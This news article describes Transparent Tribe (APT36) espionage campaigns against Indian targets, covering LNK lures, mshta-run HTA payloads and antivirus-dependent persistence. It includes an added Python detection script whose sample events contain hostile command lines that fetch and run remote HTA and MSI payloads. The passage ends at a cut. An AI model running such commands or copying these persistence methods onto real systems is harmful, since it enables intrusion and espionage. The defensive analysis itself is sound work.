Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts.

“The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” CYFIRMA said in a technical report.

Transparent Tribe, also called APT36, is a hacking group that’s known for mounting cyber espionage campaigns against Indian organizations. Assessed to be of Pakistani origin, the state-sponsored adversary has been active since at least 2013.

The threat actor boasts of an ever-evolving arsenal of RATs to realize its goals. Some of the trojans put to use by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.

The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using “mshta.exe” that decrypts and loads the final RAT payload directly in memory. In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users’ suspicion.

“After decoding logic is established, the HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment,” CYFIRMA noted. “This behavior demonstrates environment profiling and runtime manipulation, ensuring compatibility with the target system and increasing execution reliability, techniques commonly observed in malware abusing ‘mshta.exe.’”

A noteworthy aspect of the malware is its ability to adapt its persistence method based on the antivirus solutions installed on the infected machine –

  • If Kaspersky is detected, it creates a working directory under “C:\Users\Public\core\,” writes an obfuscated HTA payload to disk, and establishes persistence by dropping a LNK file in the Windows Startup folder that, in turn, launches the HTA script using “mshta.exe”
  • If Quick Heal is detected, it establishes persistence by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload to disk, and then calling it using the batch script
  • If Avast, AVG, or Avira is detected, it works by directly copying the payload into the Startup directory and executing it
  • If no recognized antivirus solution is detected, it falls back to a combination of batch file execution, registry-based persistence, and payload deployment prior to launching the batch script

The second HTA file includes a DLL named “iinneldc.dll” that functions as a fully-featured RAT, supporting remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.

“APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors,” the cybersecurity company said.

In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader, which then drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access.

The shortcut is designed to execute an obfuscated command using cmd.exe to retrieve an MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co[.]in”), which is responsible for initiating a series of actions –

  • Extract and display a decoy PDF document to the victim
  • Decode and write DLL files to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll”
  • Drop “PcDirvs.exe” to the same location and execute it after a delay of 10 seconds
  • Establish persistence by creating “PcDirvs.hta” that contains Visual Basic Script to make Registry modifications so that “PcDirvs.exe” is launched at every system startup
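As an added illustration of how a defender might look for the behaviours shared by both infection chains described above (remote HTA execution via mshta.exe, HTA staging under C:\Users\Public, batch launchers in the Startup folder, and MSI packages pulled straight from a remote host), the following Python script is not from CYFIRMA's report or either campaign; it runs a few simple rules over constructed Sysmon-style process-creation events. Every hostname, path, user name and event field in it is made up.

```python
import re

# Constructed Sysmon-style process-creation events; none of these are real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",                       # remote HTA, as in the LNK lure
     "cmdline": r"mshta.exe https://cdn.example.invalid/notice.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",                       # staged HTA under C:\Users\Public
     "cmdline": r"mshta.exe C:\Users\Public\core\svc.hta"},
    {"image": r"C:\Windows\System32\cmd.exe",                         # batch launcher from the Startup folder
     "cmdline": r'cmd.exe /c "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat"'},
    {"image": r"C:\Windows\System32\cmd.exe",                         # MSI fetched straight from a web host
     "cmdline": r"cmd.exe /c msiexec /i https://files.example.invalid/setup.msi /qn"},
    {"image": r"C:\Windows\System32\mshta.exe",                       # benign: vendor HTA under Program Files
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

STARTUP_DIR = "\\start menu\\programs\\startup\\"   # per-user or all-users Startup folder
PUBLIC_DIR = "\\users\\public\\"                    # world-writable staging location used above
URL_RE = re.compile(r"https?://", re.I)


def classify(event):
    """Return the names of the rules an event matches (empty list = nothing suspicious)."""
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    hits = []
    if image.endswith("\\mshta.exe"):
        if URL_RE.search(cmd):                       # HTA loaded directly from a web server
            hits.append("mshta_remote_hta")
        if PUBLIC_DIR in cmd or STARTUP_DIR in cmd:  # HTA staged in a user-writable/autorun location
            hits.append("mshta_hta_from_writable_dir")
    if image.endswith("\\cmd.exe") and STARTUP_DIR in cmd and ".bat" in cmd:
        hits.append("startup_batch_launcher")        # batch file run out of the Startup folder
    if image.endswith(("\\cmd.exe", "\\msiexec.exe")) and "msiexec" in cmd and URL_RE.search(cmd):
        hits.append("msiexec_remote_package")        # MSI installed from a remote URL
    return hits


def triage(events):
    """Keep only events that matched at least one rule, paired with their rule names."""
    flagged = []
    for event in events:
        hits = classify(event)
        if hits:
            flagged.append((event["cmdline"], hits))
    return flagged


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline)
```

These rules are deliberately coarse; in production they would be tuned against the environment's known-good mshta.exe and msiexec.exe usage and paired with file-creation monitoring of the Startup folder and Run keys.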

It’s worth pointing out that the lure PDF displayed is a legitimate advisory issued by the National Cyb
